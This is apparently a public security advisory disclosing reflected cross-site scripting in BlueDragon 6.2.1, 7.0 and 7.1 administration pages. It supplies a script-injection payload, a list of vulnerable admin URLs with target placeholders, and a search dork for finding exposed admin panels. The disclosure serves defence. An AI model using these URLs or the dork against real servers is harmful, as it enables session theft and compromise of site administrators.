I. VULNERABILITY

BlueDragon 6.2.1, 7.0, 7.1 Reflected Cross-Site Scripting

II. SOURCE:

http://www.newatlanta.com/c/products/bluedragon/download/home

III. BACKGROUND

BlueDragon is a family of runtime server-side products for the deployment
of ColdFusion Markup Language (CFML) pages - with native technology
plataform
integration on the operation system web server anda database of your choice.

IV. NEW ATLANTA BUG TRACKING VULNERABILITY ID

# 3435

VI. VENDOR RESPONSE


V. TECHNICAL DETAILS

# Exploit Title: BlueDragon Enterprise Server Multiple XSS Vulnerabilities
# Google Dork: "BlueDragon Administration"
# Date: 21/07/2015
# Author: www.newatlanta.com
# Software Link: www.newatlanta.com/bluedragon/
# Version: 6.2.1, 7.0, 7.1
# Exploit Discovered : Glaysson Santos
# Website : di9jun9.blogspot.com

To reproduce this Flaw, put javascript XSS Payload
(i.e:"><script>alert("0cn1")</script>)
in the "XSS" bellow:


- without authentication

http://[TARGET]/bluedragon/admin.cfm?MESSAGE=XSS
http://[TARGET]/bluedragon/login.cfm?MESSAGE=XSS

- authenticated - affected scripts

http://
[TARGET:PORT]/bluedragon/admin/collectionIndex.cfm?CollectionName=test.col&CollectionLanguage=XSS

http://
[TARGET:PORT]/bluedragon/admin/caching.cfm?MESSAGE=XSS&ACTION=FLUSHFILECACHE

http://
[TARGET:PORT]/bluedragon/admin/cfmapping_edit.cfm?STATUS=NOK&MESSAGE=XSS&ID=1&DNAME=/c:&isGlobal=XSS

http://[TARGET:PORT]/bluedragon/admin/font.cfm?STATUS=OK&MESSAGE=XSS

http://[TARGET:PORT]/bluedragon/admin/datasources_wizard1.cfm?MESSAGE=XSS


The javascript will execute and display  "0cn1"


Greetings